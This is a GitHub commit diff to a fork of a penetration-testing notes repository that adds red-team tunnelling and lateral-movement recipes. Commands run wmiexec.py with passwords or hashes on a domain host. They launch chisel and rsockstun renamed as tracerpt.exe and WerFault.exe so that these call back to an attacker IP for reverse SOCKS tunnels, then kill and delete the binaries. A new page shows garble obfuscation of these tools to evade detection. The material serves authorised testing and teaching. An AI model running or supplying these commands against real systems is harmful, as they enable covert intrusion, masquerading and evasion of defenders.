forked from snovvcrash/PPN
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
cc15631
commit 18227a7
Showing
9 changed files
with
98 additions
and
7 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -55,6 +55,9 @@ Get-WmiObject -Class Win32_Group | ft -AutoSize | |
|
||
## wmiexec.py | ||
|
||
- [https://github.com/XiaoliChan/wmiexec-RegOut](https://github.com/XiaoliChan/wmiexec-RegOut) | ||
- [https://github.com/XiaoliChan/wmiexec-Pro]() | ||
|
||
``` | ||
$ wmiexec.py -codec cp866 snovvcrash:'Passw0rd!'@192.168.1.11 | ||
$ wmiexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 [email protected] | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -282,13 +282,12 @@ Other `xfreerdp` tips: | |
|
||
- [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) | ||
- [https://github.com/ginuerzh/gost](https://github.com/ginuerzh/gost) | ||
- [https://github.com/llkat/rsockstun](https://github.com/llkat/rsockstun) | ||
- [https://github.com/sysdream/ligolo](https://github.com/sysdream/ligolo) | ||
- [https://github.com/nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng) | ||
|
||
|
||
|
||
### proxychains-ng | ||
### proxychains4 (proxychains-ng) | ||
|
||
* [https://github.com/rofl0r/proxychains-ng](https://github.com/rofl0r/proxychains-ng) | ||
|
||
|
@@ -322,6 +321,10 @@ $ sshuttle -vr [email protected] 192.168.1.0/24 -e "ssh -i ./key" | |
- [https://github.com/jpillora/chisel/releases](https://github.com/jpillora/chisel/releases) | ||
- [https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel](https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel) | ||
|
||
{% content-ref url="/redteam/maldev/golang.md" %} | ||
[golang.md](golang.md) | ||
{% endcontent-ref %} | ||
|
||
{% embed url="https://snovvcrash.github.io/2020/03/17/htb-reddish.html#chisel-socks" caption="HTB Reddish: Chisel SOCKS" %} | ||
|
||
* Attacker's IP: `10.10.13.37` | ||
|
@@ -361,6 +364,14 @@ snovvcrash@kali:~$ ./chisel server -p 8000 --reverse --socks5 [--auth snovvcrash | |
alice@victim:~$ nohup ./chisel client [--fingerprint <BASE64_STRING>] [--auth snovvcrash:'Passw0rd!'] 10.10.13.37:8000 R:[127.0.0.1:1080:]socks & | ||
``` | ||
|
||
Quicky: | ||
|
||
``` | ||
$ wmiexec.py -nooutput megacorp.local/[email protected] 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"' | ||
$ sudo chisel client -v --auth snovvcrash:'Passw0rd!' 192.168.1.11:8000 127.0.0.1:1080:socks | ||
$ wmiexec.py -nooutput megacorp.local/[email protected] 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe' | ||
``` | ||
|
||
|
||
#### Double SOCKS Proxy | ||
|
||
|
@@ -398,6 +409,23 @@ alice@victim:~$ ./revsocks -connect 10.14.14.3:8000 -pass 'Passw0rd!' | |
|
||
|
||
|
||
### rsockstun | ||
|
||
- [https://github.com/llkat/rsockstun](https://github.com/llkat/rsockstun) | ||
|
||
{% content-ref url="/redteam/maldev/golang.md" %} | ||
[golang.md](golang.md) | ||
{% endcontent-ref %} | ||
|
||
``` | ||
$ openssl req -new -x509 -keyout cert.key -out cert.crt -days 365 -nodes | ||
$ sudo rsockstun -listen :8000 -socks 127.0.0.1:1080 -cert cert -pass 'Passw0rd!' | ||
$ wmiexec.py -nooutput megacorp.local/[email protected] 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"' | ||
$ wmiexec.py -nooutput megacorp.local/[email protected] 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe' | ||
``` | ||
|
||
|
||
|
||
### Neo-reGeorg | ||
|
||
* [https://github.com/L-codes/Neo-reGeorg](https://github.com/L-codes/Neo-reGeorg) | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
# Golang | ||
|
||
- [https://www.redteam.cafe/red-team/golang/red-team-how-to-embed-golang-tools-in-c](https://www.redteam.cafe/red-team/golang/red-team-how-to-embed-golang-tools-in-c) | ||
|
||
|
||
|
||
|
||
## Obfuscate Go Tooling | ||
|
||
|
||
|
||
### garble | ||
|
||
Example with [chisel](https://github.com/jpillora/chisel): | ||
|
||
``` | ||
$ go install mvdan.cc/garble@latest | ||
$ go install github.com/jpillora/chisel@latest | ||
$ git clone https://github.com/jpillora/chisel chisel-src && cd chisel-src | ||
$ env CGO_ENABLE=1 GOOS=windows GOARCH=amd64 garble -literals -tiny build -trimpath | ||
``` | ||
|
||
Example with [rsockstun](https://github.com/llkat/rsockstun): | ||
|
||
``` | ||
$ git clone https://github.com/llkat/rsockstun rsockstun-src && cd rsockstun-src | ||
$ go mod init rsockstun && go mod tidy | ||
$ env CGO_ENABLE=1 GOOS=windows GOARCH=amd64 garble -literals -tiny build -trimpath | ||
``` |